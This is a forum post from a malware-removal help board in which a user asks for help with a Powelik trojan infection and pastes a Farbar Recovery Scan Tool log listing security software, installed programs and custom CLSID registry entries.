Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Powelik Trojan on 3rd User now - Please help!


  • This topic is locked This topic is locked
38 replies to this topic

#1 Shate'

Shate'

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:03:41 PM

Posted 04 November 2014 - 11:40 AM

This is the FRST scan I took the liberty of pre-running.  I assume the fixit list file is next, but I believe I have to wait for someone to look at the results and tell me how to procede.

 

Thank you so much in advance!

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by boylem1 at 2014-11-04 11:27:30
Running from C:\Users\boylem1\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Symantec Endpoint Protection (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat 9 Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000004}{AC76BA86-1033-0000-7760-000000000004}) (Version: 9.0.0 - Adobe Systems)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\{1F5E5F2E-5E61-431D-B796-58CCC6B68E28}) (Version: 14.0.0.125 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Altiris Application Metering Agent (x32 Version: 7.5.3280.0 - Symantec Corporation) Hidden
Altiris Deployment Agent (HKLM\...\{6C8D5E56-CA12-42B2-9075-044B4C7067A9}) (Version: 1.0.0 - Altiris)
Altiris Inventory Agent (x32 Version: 7.5.3280.0 - Symantec Corporation) Hidden
AMD Catalyst Install Manager (HKLM\...\{100E94A6-F85A-E828-9EE3-C1DD14706B6A}) (Version: 3.0.855.0 - Advanced Micro Devices, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.18 - Piriform)
Cisco Jabber (HKLM-x32\...\{06ADF300-8B40-4B78-B2D1-829CE10080B9}) (Version: 10.5.0.37889 - Cisco Systems, Inc)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix online plug-in (HKLM-x32\...\CitrixOnlinePluginFull) (Version: 12.3.0.8 - Citrix Systems, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM-x32\...\Office14.STANDARD) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visio Standard 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visio Viewer 2013 (HKLM\...\{95150000-0052-0409-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 32.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0.3 (x86 en-US)) (Version: 32.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
NSSSLInstall (HKLM-x32\...\{35818FB9-877D-43FA-878C-A6D06AFE839F}) (Version: 1.20.0000 - Black Box Network Services)
Online Plug-in (x32 Version: 14.1.200.13 - Citrix Systems, Inc.) Hidden
Patch Management Agent (Version: 7.5.3219.0 - Symantec) Hidden
PSRViewer (HKLM-x32\...\{5A8C967D-CD13-41EB-8911-09388803E90C}) (Version: 12.1.0.6518 - Black Box Network Services)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5907 - Realtek Semiconductor Corp.)
Self-service Plug-in (x32 Version: 4.1.200.588 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0012-0000-0000-0000000FF1CE}_Office14.STANDARD_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Visio 2010 (KB2687468) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version:  - Microsoft)
Software Management Solution Plugin (Version: 7.5.3219.0 - Altiris Inc.) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.26 - Piriform)
Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation)
Symantec Management Agent (HKLM\...\AltirisAgent) (Version: 7.5.3193.0 - Symantec Corporation)
UC700 Client (HKLM-x32\...\{289043F4-94B9-4021-BDBD-3B5504C3E24B}) (Version: 10.0.1082 - NEC Corporation)
Unified Messaging for Exchange (HKLM-x32\...\{63EBAF59-DAC7-4E43-AF3D-0ECE88647A8B}) (Version: 6.1.0.300 - Zeacom)
WebEx Productivity Tools (HKLM-x32\...\{4CFEC903-E506-480A-8351-3A7A402C3A06}) (Version: 2.36.900.10068 - Cisco WebEx LLC)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0049A510-CE20-302F-A9C6-722FEE7FEE67}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{01FC31CF-8455-3064-B22D-F7E908F8D7DE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{03FA88B8-CCD8-32BA-9ED4-1C37405D98CD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{062A92D5-4E70-381B-83A6-13B1C83BB070}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0875D743-741B-306B-B263-4F1EBCB6C0E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{094557C8-8D13-3A57-93CD-48CDFBC346A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{09A0F791-40F8-3FCB-9C91-DC6F2A4DC96B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0AEB5AAD-06AE-3748-800A-63BFB53940BB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0C377237-DC8B-3D6D-BCF8-E4F156760E9B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0CE87BF5-DA17-3EA0-8B90-79E59792F4F3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0D7A82DE-6A6D-3BB1-8E24-386FB792930D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{0DE2534F-A3C8-3E24-9749-687850CEB3A8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{1060D0CD-5B56-3EEE-BB3A-AEC8472522B3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{1299B0C9-29A3-3940-AC1D-1FFC076798B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{16746680-B251-396C-914A-0211B5CB7F23}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{16ADB401-64F5-3324-A88A-10AE369749FB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{16E320DC-C9FC-33E3-8B4D-7BF35CF3B7E3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{171A0B7B-6ADA-3C17-B15F-17B0B0E938A6}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{17608187-F734-32F0-9A46-71A10F592910}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{1B1C5E01-5354-36F7-8E8F-0F8AEE27E5E0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{20FC2C0D-E606-3FB2-BD1A-A2A8E8E08AFC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{212D7A0C-C0C7-3F44-958D-E62CAD50DEB4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{231B15ED-A845-368D-B77C-C735413ADFA9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{252EE0FB-BF08-30FB-84DF-BA863C6AFA09}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2A6FC347-B37A-3B7A-8DA8-FA857F1446CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2ABCFF5F-70A5-3EAD-BA6A-CB8788133E18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2B8CDD04-8362-3A61-9B63-EC81420660C0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2BEF5A3E-62E8-3FF1-AD40-50C9DA88B34C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2DBA2186-EF21-3F3D-9CFB-5BF6DCF25033}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{2DF1F61C-F3E8-389B-8ED1-43CB730D4B1B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{30641C81-F598-3FDF-92F7-533A6BD583D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{363E6FFC-356F-336B-9603-D18DD89BB467}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{36F46B2D-E21B-3596-AC3A-4571C6AE860A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{383C94DE-A44C-3797-8D64-ACADF5674A26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{387A1CD6-F50C-44FB-A7EA-F75D30D7A97F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{39E91280-1847-3A1C-8A47-5184F46E3A13}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{3B24BA91-8C3E-3EC4-B826-52D8C96728E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{3BAAAA84-78E2-398D-A121-8D99F410D18E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{3EBFE219-45D6-35F9-8DDF-1541AD510CB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{3F68BBEB-0B8B-3B24-BBFD-010BB3863E5A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{41B58D9B-1466-3534-B9CF-ABFBF0E01497}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{45694048-12CD-3955-B3A6-6421E838EF07}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4614FD5F-E173-32A3-A51C-FECE7F49EF63}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{47881152-4D8A-36E9-A24B-1CA70F59EE76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{47BD9AAC-EEA1-3FC7-A018-773D50510A76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{481DEACC-30B8-3F97-A977-1DDA68B0079A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{48D01E5B-8CFB-3C28-ADAC-76378A5988DA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4A66387D-0DDE-307C-A1AD-FC30A4C74E8A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4BB3F9DD-DE20-37E8-AE2A-B4DDE25B1028}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4BDE841C-BB63-3052-89E0-BD9CDED34C18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4C1695C6-8CC6-33DE-9602-D08E362459E8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4D6F1061-763F-3C80-AB08-32F04A3F838B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4D73F17A-8088-399E-B02D-2F2944110BDD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{4F60C2CF-A617-31F9-A6B2-E35CB0DAE0E5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5321670B-8407-3998-86AA-228D78C128C7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{55F27E2B-DE74-3EED-BD20-CBECE5A117E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{57076BCB-E627-31C6-8EE9-30D3AB0895DF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{587E0510-7EB8-3599-85BC-F4962BD1DFB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{587F181A-5CEF-383C-9DC8-D9ABF5CEB1AC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5978A4C6-118E-3F57-A425-65E391B76C31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5A7CD925-9137-3A3F-A543-DA436A3137AD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5B330AAB-0460-31C6-9C85-22BF15EAC2CB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5B72D367-E84F-3E94-B304-31B028D87BEA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5BE1CBDA-7B78-3990-8E05-0377B29D49A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5D0CE54B-6079-318B-8EEB-20D249A84351}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5E076B60-76EB-3E07-8F69-82EE2642930A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{5FCEDC9E-9389-3A05-8455-3B225C51806F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{60AD41B4-6868-3EA3-8B57-A45930264327}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{61683280-8AC4-3981-BFBB-1004BCC37891}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{64AA1680-B0AD-3982-9F3A-924934552303}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{64F46A4A-9035-3B06-8DD6-87541CA8C3BA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{671C8C4D-93CC-38E2-BC04-24010E0337EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{67A2A120-A312-3212-BE67-CC7476D827CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{691958C5-FE10-31D6-9874-980096EC8446}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{6E8A23DE-97C1-331D-A789-E1E4AE2C197E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{700A43B3-EF3C-3B56-A247-591454BDAEBC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{720F6709-13E4-37CB-838B-7BA4FBAA63EB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{733BCCDC-92E5-3751-95F4-F45184D8B2CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{769E7ECC-E57C-392D-BEB3-F25384BD8D25}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{7EDD8B4A-CB15-3DAC-AFFB-0BD4044CDDC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{80E94B46-F2A1-3657-A246-D60FB6807135}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{822AA8AB-2123-4775-9AED-99D721F01F3F}\InprocServer32 -> C:\Users\boylem1\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader64.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{8378A528-0596-3A5D-BF28-B7C56D54E252}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{8C93355E-631C-32DF-B144-06CAE92FBFBA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{8D511488-C738-3C57-93A2-28D8BA40250D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{92036FFB-8CFC-394D-B57C-062C39EB343B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{93C557D7-77E5-3A51-BAAB-36775F2DCEF4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{94F656C1-A93B-3407-93C5-11D9CF37A8A1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{980BAAE7-775C-3DC9-9C4A-03D86AC7A267}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{9C1BC9ED-7948-3058-AFE6-96156B017922}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{9CF1E5F4-3520-3488-8EDB-E56627329B15}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{9D39DA6C-6342-34DC-B1A1-C7B844CD71A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{9E29DB84-9BF6-3F56-BE2C-609F0629E0C3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{A0CAE551-D8C3-3F13-86C3-D96DACEB90A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{A14EBAA2-383F-3C3E-88D3-AD908906F029}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-8083_Classes\CLSID\{AA073870-297C-3996-B178-D92EBF4A820F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
